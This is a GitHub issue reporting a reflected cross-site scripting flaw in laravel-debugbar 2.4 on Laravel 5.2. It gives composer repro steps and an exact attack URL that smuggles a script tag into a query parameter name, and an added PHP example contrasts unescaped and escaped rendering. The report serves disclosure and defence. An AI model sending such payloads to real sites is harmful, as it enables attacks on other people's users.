Security Vulnerability - Cross-site Scripting #850

Closed
om3rcitak opened this issue Jul 18, 2018 · 4 comments
Security Vulnerability - Cross-site Scripting

Environment

  • Version: debugbar:~2.4, laravel:5.2.*
  • OS: Unix, Windows
  • Web server: Any web server
  • PHP: <=7.2
  • Database: Any database

Injection Technical Details

URL: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Parameter Type: Parameter Name
Attack Pattern: <scRipt>alert(21)<%2fscRipt>

Repro

$ composer create-project --prefer-dist laravel/laravel:5.2.*
$ cd laravel
$ composer require barryvdh/laravel-debugbar:~2.4
$ php artisan vendor:publish --provider="Barryvdh\Debugbar\ServiceProvider"
$ php artisan serve

and visit: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak


Notes: I am testing the laravel-debugbar latest version (2.4) for Laravel 5.2.*. This vulnerability does not affect Laravel >= 5.3 or laravel-debugbar >= 3.0 because Laravel uses a different error page template for version 5.2 and 5.3.
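The report above places the payload in a query-string parameter name, not a value, and the error page echoes it back unescaped. The following is an added illustration of that pattern and of the fix, written for this page; it is not the symfony/debug, Laravel or laravel-debugbar code, and the function names (renderRequestTableVulnerable, renderRequestTableSafe, reflectsRawPayload) and the request-table layout are assumptions chosen for the example. It parses the issue's own query string and shows which renderer still carries the raw payload:

```php
<?php
// Added illustration for this issue; not the symfony/debug or laravel-debugbar code.
// A debug/error page that lists request parameters typically renders a key/value
// table. Escaping only the value and interpolating the key raw is exactly the
// pattern that lets a crafted parameter *name* become executable markup.
declare(strict_types=1);

// Escape helper usable on PHP 7.x (no arrow functions, per the reported PHP <= 7.2 range).
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical vulnerable renderer: values are escaped, keys are not.
function renderRequestTableVulnerable(array $query): string
{
    $rows = '';
    foreach ($query as $key => $value) {
        // BUG: $key comes straight from the attacker-controlled query string.
        $rows .= '<tr><th>' . $key . '</th><td>' . esc((string) $value) . '</td></tr>';
    }
    return '<table>' . $rows . '</table>';
}

// Hardened renderer: every attacker-controlled string, keys included, is escaped.
function renderRequestTableSafe(array $query): string
{
    $rows = '';
    foreach ($query as $key => $value) {
        $rows .= '<tr><th>' . esc((string) $key) . '</th><td>' . esc((string) $value) . '</td></tr>';
    }
    return '<table>' . $rows . '</table>';
}

// Triage check: does the rendered HTML still contain the payload byte-for-byte?
// An escaped reflection (&lt;scRipt&gt;...) is harmless; a raw one is the bug.
function reflectsRawPayload(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

// Query string taken from the issue's URL, with "<%2fscRipt>" URL-decoded.
$queryString = 'op=get&id=om3rcitak&<scRipt>alert(21)</scRipt>=om3rcitak';
parse_str($queryString, $query);
$payload = '<scRipt>alert(21)</scRipt>';

echo 'vulnerable renderer reflects raw payload: '
    . var_export(reflectsRawPayload(renderRequestTableVulnerable($query), $payload), true) . PHP_EOL;
echo 'hardened renderer reflects raw payload:   '
    . var_export(reflectsRawPayload(renderRequestTableSafe($query), $payload), true) . PHP_EOL;
```

Run it with `php example.php`: the vulnerable renderer reports true and the hardened one false. The same reflectsRawPayload check, applied to the body returned by the URL in the report, is the quickest way to confirm whether a given Laravel/Symfony combination is still affected after upgrading: look for the raw `<scRipt>` string in the response rather than trusting version numbers alone.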

@om3rcitak (Author)

In fact, this vulnerability is due to the symfony/debug library.
Issue: symfony/symfony#27987
Fix commit: symfony/debug@e48bda2

@barryvdh (Owner)

So only for 2.4 version using an old Symfony version?

@om3rcitak (Author)

@barryvdh yes, but the problem is not from debugbar. Laravel's composer.json file must be changed. But the Laravel team doesn't think they should change the composer.json file :) details: laravel/framework#24892

@stale

stale bot commented Jul 29, 2020

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.
If this issue is still present on the latest version of this library on supported Laravel versions, please let us know by replying to this issue so we can investigate further.
Thank you for your contribution! Apologies for any delayed response on our side.

@stale stale bot added the stale label Jul 29, 2020
@stale stale bot closed this as completed Aug 6, 2020